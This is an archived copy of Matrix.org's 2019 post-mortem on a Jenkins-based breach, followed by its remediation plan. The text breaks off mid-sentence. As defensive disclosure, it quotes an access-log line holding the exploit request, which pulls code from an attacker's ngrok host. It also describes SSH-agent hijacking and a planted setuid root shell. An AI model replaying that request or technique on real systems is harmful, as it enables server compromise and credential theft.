{
	"id": "af88d88e-faf2-4b87-a034-ef286a5ac0e0",
	"created_at": "2026-04-06T00:07:56.53816Z",
	"updated_at": "2026-04-10T03:35:21.353824Z",
	"deleted_at": null,
	"sha1_hash": "0c05a3841c348868350653525245f9c18e80ce88",
	"title": "Post-mortem and remediations for Apr 11 security incident",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 721505,
	"plain_text": "Post-mortem and remediations for Apr 11 security incident\r\nBy Matthew Hodgson\r\nPublished: 2019-05-08 · Archived: 2026-04-05 18:20:16 UTC\r\n🔗Table of contents\r\nIntroduction\r\nHistory\r\nThe Incident\r\nThe Defacement\r\nThe Rebuild\r\nRemediations\r\nSSH\r\nSSH agent forwarding should be disabled.\r\nSSH should not be exposed to the general internet\r\nSSH keys should give minimal access\r\nTwo factor authentication\r\nIt should be made as hard as possible to add malicious SSH keys\r\nChanges to SSH keys should be carefully monitored\r\nSSH config should be hardened, disabling unnecessary options\r\nNetwork architecture\r\nKeeping patched\r\nIntrusion detection\r\nIncident management\r\nConfiguration management\r\nAvoiding temporary measures which last forever\r\nSecure packaging\r\nDev and CI infrastructure\r\nLog minimisation and handling Personally Identifying Information (PII)\r\nConclusion\r\n🔗Introduction\r\nHi all,\r\nOn April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver -\r\nspecifically: removing an attacker who had gained superuser access to much of our production network. We provided\r\nupdates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full\r\nanalysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has\r\ntaken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and\r\nwe also wanted to get the key remediation work in place before writing up the post-mortem.\r\nFirstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix\r\nnetwork - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say\r\n“Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got\r\ncompromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted.\r\nThis is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this\r\nincident), but this incident was not related to the protocol.\r\nBefore we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an\r\naltruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised\r\ncommunication protocol and network for the benefit of everyone; giving users total control back over how they\r\ncommunicate online.\r\nIn this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time\r\naround the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help\r\nbootstrap the Matrix ecosystem, and we paid the price.\r\nThis post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and\r\nindeed intend to come out of this episode stronger than you can possibly imagine :)\r\nMeanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will\r\nthis make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE\r\ncompatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 1 of 10\n\nwe raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches -\r\nfor which we need your support.\r\nFinally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them\r\nresponsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.\r\n🔗History\r\nFirstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs\r\nacross roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots,\r\nintegrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the\r\nnetwork and make life easier for first-time users.\r\nThe deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our\r\nprevious datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the\r\nwell-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as\r\npossible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could.\r\nWe had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams\r\nputting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server\r\nrunning and trying to actually develop and improve Matrix itself.\r\nIn practice, this meant that some corners were cut that we expected to be able to come back to and address once we had\r\ndedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply\r\nSSHing into the servers over the internet. We also went for the simplest possible config management system: checking all\r\nthe configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations\r\n- for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t\r\ntweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these\r\nthings right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once\r\nwe fixed up the hosts with proper configuration management etc.\r\nSeparately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately,\r\ndespite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS\r\nproject, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly\r\nvisible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some\r\nmacOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.\r\nLots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began\r\ntalking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta\r\nand to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked\r\nup more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by\r\nshielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).\r\nGood news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point,\r\nhowever, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the\r\nstartup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider,\r\nand secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be\r\nused. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy\r\ndatacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im\r\nand France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the\r\nMatrix.org server entirely, once we have account portability).\r\nSo we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and\r\nfester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the\r\nlegacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow\r\nroot login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of\r\nthe normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we\r\nsimply failed to prioritise getting back to fix them.\r\n🔗The Incident\r\nThe first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via\r\nDM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our\r\nJenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the\r\nsecurity advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr\r\n10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.\r\nIn this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This\r\nwas suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 2 of 10\n\nauthorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1-\u003eSSH2). Further inspection\r\nshowed that 19 hosts in total had the same key present in the same place.\r\nAt this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking\r\nsnapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their\r\ntracks. Findings were:\r\nThe attacker had first compromised Jenkins on March 13th via an RCE vulnerability (CVE-2019-1003000 -\r\nhttps://www.exploit-db.com/exploits/46572):\r\nmatrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] \"GET\r\n/jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?\r\nvalue=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(gr\r\nHTTP/1.1\" 500 6083 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0\"\r\nThis allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous\r\nintegration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately\r\nexposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which\r\nwaited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to\r\nadd the attacker’s SSH key to root@ on as many other hosts as possible.\r\nOn Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some\r\nadmin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap,\r\nand resulted in the majority of the malicious keys being inserted to the remote hosts.\r\nFrom this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our\r\npassbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for\r\nuse in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot ).\r\nThe majority of access to the hosts occurred between Apr 4th and 6th.\r\nThere was no evidence of large-scale data exfiltration, based on analysing network logs.\r\nThere was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did\r\nrun on the old infrastructure, but it was not used to tamper with the modular instances themselves).\r\nThere was no evidence of the identity server databases having been compromised.\r\nThere was no evidence of tampering in our source code repositories.\r\nThere was no evidence of tampering of our distributed software packages.\r\nTwo more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged\r\ninto a production server.\r\nBy around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at\r\nevicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.\r\nWe then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action\r\nwhen an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old\r\nhosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts,\r\nand redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with\r\nunplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data\r\nvolumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a\r\nwebsite up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated\r\nWordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to\r\nkeep our attack surface as small as possible going forwards).\r\nGiven the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the\r\nattacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change\r\ntheir passwords, given the salted \u0026 hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.\r\nAt about 4am we had enough of the bare necessities back up and running to pause for sleep.\r\n🔗The Defacement\r\nAt around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a\r\ndefacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being\r\ntransparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including\r\nthe production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to\r\nget on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t\r\nback up (we now have emergency-emergency-paging for this eventuality).\r\nOn inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint\r\nthe DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 3 of 10\n\ncompromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes\r\nto our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...\r\n...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we\r\nclicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the\r\nChange API Key button.\r\nUnfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As\r\na result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.\r\nTo flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the\r\nright place, and continued on with the rebuild.\r\n🔗The Rebuild\r\nThe goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good\r\nsecurity practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure\r\nthe new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that\r\nmade the breach possible were mitigated:\r\nAccess via SSH restricted as heavily as possible\r\nSSH agent forwarding disabled server-side\r\nAll configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.\r\nThen, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing\r\nwith securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:\r\nJenkins has been replaced by Buildkite\r\nWordpress has been replaced by static generated sites (e.g. Gatsby)\r\ncgit has been replaced by gitlab.\r\nEntirely new packaging building, signing \u0026 distribution infrastructure (more on that later)\r\netc.\r\nNow, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load\r\nbalancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the\r\ninfra - which is why it is taking a while to get full parity with where we were before.\r\nIn the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing\r\nservice list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 4 of 10\n\nApologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few\r\npending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work,\r\nother security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored\r\nsecurely.\r\n🔗Remediations\r\nOnce the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the\r\nwhole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.\r\nWe’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking,\r\nand in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the\r\nitems, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we\r\ndon’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once\r\nongoing work is complete, however.\r\nWe should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr\r\n12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings\r\nfrom our forensics on Apr 10, and their suggested remediations aligned with our plan.\r\nWe’ve split the remediation work into the following domains.\r\n🔗SSH\r\nSome of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:\r\n🔗SSH agent forwarding should be disabled.\r\nSSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH\r\nkeys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are\r\nto make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via\r\nSSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it,\r\nletting the server impersonate you.\r\nThe common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For\r\ninstance, Github’s guide to using SSH agent forwarding says:\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 5 of 10\n\nWarning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to\r\nall SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you\r\nSSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection\r\nis established. You should only add servers you trust and that you intend to use with agent forwarding\r\nAs a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs,\r\nthinking “well, what can we trust if not our own servers?”\r\nThis was a massive, massive mistake.\r\nIf there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in\r\ngeneral you should never use it. Not only can malicious code running on the server as that user (or root) hijack your\r\ncredentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be\r\ninaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded\r\nagent, and boom, even if it was just a one-off ssh -A .\r\nOur remediations for this are:\r\nDisable all ssh agent forwarding on the servers.\r\nIf you need to jump through a box to ssh into another box, use ssh -J $host .\r\nThis can also be used with rsync via rsync -e \"ssh -J $host\"\r\nIf you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly\r\nrecommends using more modern protocols than scp).\r\nIf you need to regularly copy stuff from server to another (or use SSH to GitHub to check out something from a\r\nprivate repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able\r\nto perform limited actions.\r\nIf you just need to check out stuff from public git repos, use https rather than git+ssh.\r\nTry to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can\r\nat least be a horrible warning...\r\nAnother approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to\r\naccess your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c , but gnome-keyring for instance\r\ndoesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.\r\n🔗SSH should not be exposed to the general internet\r\nNeedless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev\r\nnetwork, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as\r\nminimal as possible.\r\n🔗SSH keys should give minimal access\r\nAnother major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that\r\nSSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over\r\nSSH.\r\nA typical scenario where users might end up with unnecessary access to production are developers who simply want to push\r\nnew code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure\r\neverywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is\r\ncontinuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs\r\nshould be available to developers from a logserver in real time, without having to SSH into the actual production host.\r\nWe’ve already been experimenting internally with sentry for this.\r\nRelatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access),\r\nto have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already\r\nstarted this process, and while it didn’t help prevent the attack, it did assist with forensics).\r\n🔗Two factor authentication\r\nWe are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding\r\nhijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.\r\n🔗It should be made as hard as possible to add malicious SSH keys\r\nWe’ve decided to stop users from being able to directly manage their own SSH keys in production via\r\n~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root\r\nusers set keys.\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 6 of 10\n\nInstead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s\r\nAuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).\r\n🔗Changes to SSH keys should be carefully monitored\r\nIf we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this\r\nby managing the keys exclusively via Ansible, and also improving our intrusion detection in general.\r\nSimilarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).\r\n🔗SSH config should be hardened, disabling unnecessary options\r\nIf we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught\r\nseveral of these failure modes at the outset. We’ve now done so (as per above).\r\nWe’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old\r\noptions just don’t need to exist on most newly provisioned machines.\r\n🔗Network architecture\r\nAs mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a\r\ncore network or a good split between different production environments.\r\nWe are addressing this by:\r\nSplitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only\r\naccess each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).\r\nDevelopment\r\nIntranet\r\nPackage Build (airgapped; see below for more details)\r\nPackage Distribution\r\nProduction, which is in turn split per class of service.\r\nAccess to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device\r\ncertificate + 2FA, and SSH via keys as per above.\r\nSwitching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the\r\ndatacenter LAN).\r\nWe’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix\r\nprocesses, VMs, and occasional containers), providing an additional level of namespace isolation.\r\n🔗Keeping patched\r\nNeedless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although\r\nthere would of course still have been scope for a 0-day attack).\r\nGoing forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting\r\nsecurity advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch\r\nany gaps before attackers do.\r\nAside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking\r\nfor outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase\r\noutdated software applies equally to both.\r\nMoving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.\r\n🔗Intrusion detection\r\nThere’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies,\r\nwe’re working on real-time log analysis for aberrant behaviour.\r\n🔗Incident management\r\nThere is much we have learnt from managing an incident at this scale. The main highlights taken from our internal\r\nretrospective are:\r\nThe need for a single incident manager to coordinate the technical response and coordinate prioritisation and\r\nhandover between those handling the incident. (We lacked a single incident manager at first, given several of the\r\nteam started off that week on holiday...)\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 7 of 10\n\nThe benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being\r\nspread across different chatrooms and lost in scrollback.\r\nThe need to have an existing inventory of services and secrets available for tracking progress and prioritisation\r\nThe need to have a general incident management checklist for future reference, which folks can familiarise\r\nthemselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in\r\nfuture includes:\r\nRemembering to appoint named incident manager, external comms manager \u0026 internal comms manager.\r\n(They could of course be the same person, but the roles are distinct).\r\nDefining a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed rather\r\nthan having to work it out on the fly and risk forgetting stuff\r\nRemembering to informing the ICO (Information Commissioner Office) of any user data breaches\r\nGuidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all,\r\nbefore pulling the plug)\r\nReminders to snapshot systems for forensics \u0026 backups\r\nReminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by\r\nseizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.\r\nMaking sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to\r\nupdate their passwords before password reset had actually been restored - apologies for that.)\r\n🔗Configuration management\r\nOne of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most\r\naccounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the\r\ncheckout to wherever the app or OS needed it.\r\nThis is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in\r\nterms of being able to automatically maintain configuration and spot unauthorised configuration changes.\r\nOur solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established\r\nfor Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for\r\nthis (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.\r\n🔗Avoiding temporary measures which last forever\r\nNone of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in\r\n2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to\r\nupdate it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures\r\nlike this is to project manage the update or it will not happen. This is of course a general point not specific to this incident,\r\nbut one well worth reiterating.\r\n🔗Secure packaging\r\nOne of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository,\r\nRiot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised\r\nduring the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience\r\nof a near-automated release process without thinking through the security risks of storing keys on a production server.\r\nWhilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the\r\nproject has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and\r\nsomehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised\r\nsigning key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and\r\ndownload counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this\r\nsetback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse \u0026 Riot GPG keys and\r\ncreated new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).\r\nIn terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What\r\nwe have landed on is as follows:\r\nDevelopers create a release branch to signify a new release (ensuring dependencies are pinned to known good\r\nversions).\r\nWe then perform all releases from a dedicated isolated release terminal.\r\nThis is a device which is kept disconnected from the internet, other than when doing a release, and even then\r\nit is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise\r\nentirely isolated from the network.\r\nNeedless to say, the device is strictly used for nothing other than performing releases.\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 8 of 10\n\nThe build environment installation is scripted and installs on a fresh OS image (letting us easily build new\r\nrelease terminals as needed)\r\nThe signing keys (hardware or software) are kept exclusively on this device.\r\nThe publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively\r\non this device.\r\nWe physically store the device securely.\r\nWe ensure someone on the team always has physical access to it in order to do emergency builds.\r\nMeanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.\r\nThese live at https://packages.matrix.org and https://packages.riot.im\r\nThese are minimal machines with nothing but a static web-server.\r\nThey are accessed only via the dedicated SSH keys stored on the release terminal.\r\nThese in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online\r\nfeature, for better or worse).\r\nAlternatives here included:\r\nIn an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we\r\ndon’t have reproducible builds yet this will have to suffice for now.\r\nWe could delegate building and distribution entirely to a 3rd party setup such as OBS (as per\r\nhttps://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build\r\nacross many different platforms and OSes, so would rather build ourselves if we can.\r\n🔗Dev and CI infrastructure\r\nThe main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well\r\nfor Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was\r\nproviding. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has\r\ndone so quite painlessly.\r\nThe new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g.\r\nriot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than\r\npushing the artefact via SSH to production.\r\nOther than CI, our strategy is:\r\nContinue using Github for public repositories\r\nUse gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)\r\nContinue to host docker images on Docker Hub (despite their recent security dramas).\r\n🔗Log minimisation and handling Personally Identifying Information (PII)\r\nAnother thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker\r\ngoing spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on\r\nmatrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic\r\nfor a bug only to discover that logging didn’t pick it up.\r\nHowever, we can still improve our logging and PII-handling substantially:\r\nEnsuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd\r\nparty IDs etc).\r\nMinimising log retention to the bare minimum we need to investigate recent issues and abuse\r\nEnsuring that PII is stored hashed wherever possible.\r\nMeanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but\r\nthere is also more we can do, particularly:\r\nTurning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at\r\nprivate message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server\r\nwas compromised, their message history was safe: we need to provide that to everyone. This is\r\nhttps://github.com/vector-im/riot-web/issues/6779.\r\nWe need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily\r\nadds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145\r\nWe need to empower users to configure history retention in their rooms, so they can limit the amount of history\r\nexposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763\r\nWe need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users\r\ncan seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.\r\n🔗Conclusion\r\nhttps://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident/\r\nPage 9 of 10\n\nHopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing\r\nto protect against this happening in future.\r\nAgain, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for\r\nyour patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up\r\nin this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also\r\nlike to particularly thank Kade 